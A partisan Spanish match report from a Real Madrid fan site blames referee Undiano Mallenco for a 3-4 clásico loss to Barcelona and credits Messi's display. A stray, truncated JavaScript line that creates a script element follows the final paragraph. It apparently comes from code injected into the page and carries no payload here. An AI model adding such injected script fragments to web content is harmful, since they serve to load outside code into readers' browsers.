Kelia Vidarte: Minuto 91/LaTribunamadridista.com
El clásico de esta noche entre Real Madrid y Barça podía haber sido un espectáculo para todos aquellos que somos amantes del buen fútbol, pero volvió a convertirse como siempre en un espectáculo arbitral donde Undiano Mallenco fue el protagonista de la noche y donde los blancos salieron mal parados. Todo ello unido a la facilidad de Messi de sacarnos los colores cada vez que pisa el Bernabéu han sido los detonantes para que el Madrid pierda una ocasión perfecta para amarrarse al liderato de la Liga.
Fue un partido en el cual el Madrid no supo aprovechar las ocasiones que se le toparon en el camino y donde la expulsión de Ramos sobre un supuesto derribo a Neymar fue determinante para los visitantes, quienes propiciaron la remontada. El Barça volvió a sacar su famoso tiqui taca para frenar la bravura inicial de los hombres de Ancelotti.
Los hombres de Martino no estuvieron muy finos no obstante supieron hallar la red del enemigo blanco.Los blancos solo pudieron aferrarse al artillero galo Benzema, el francés no estuvo certero los primeros minutos del encuentro pero sacó su garra minutos después con pases y gol incluido, manejando el esférico de la mejor forma.
El FC Barcelona supo sacar petróleo de acciones y fallos del equipo blanco. Undiano estuvo allí para cederle margen, actuando de una forma desmedida a la hora de sacar tarjetas amarillas a los blancos y cobrarles penaltis, muchas veces irreconocibles y determinantes en el encuentro. Sin duda ha sido un encuentro en el cuál el Madrid se desestabilizo gracias a Undiano y el Barça se aferró a un Messi inmensurable.
En los minutos finales de partido ambos entrenadores sacaron sus armas del banquillo. El Madrid sin salida no perdió en ningún momento la cara al encuentro a pesar de encontrarse con 10 jugadores en el campo y se aferró en el área defensiva para evitar el gol que finalmente llegó, con un penalti que el argentino incrustó en la red y certificó la victoria de los azulgranas 3-4 .
Con este resultado el Atlético de Madrid es el mejor parado, convirtiéndose en líderes de la Liga empatado con el Madrid. Porque señores los blancos pudieron hacer más y Undiano pudo hacer menos.
var d=document;var s=d.createElement(‘script’);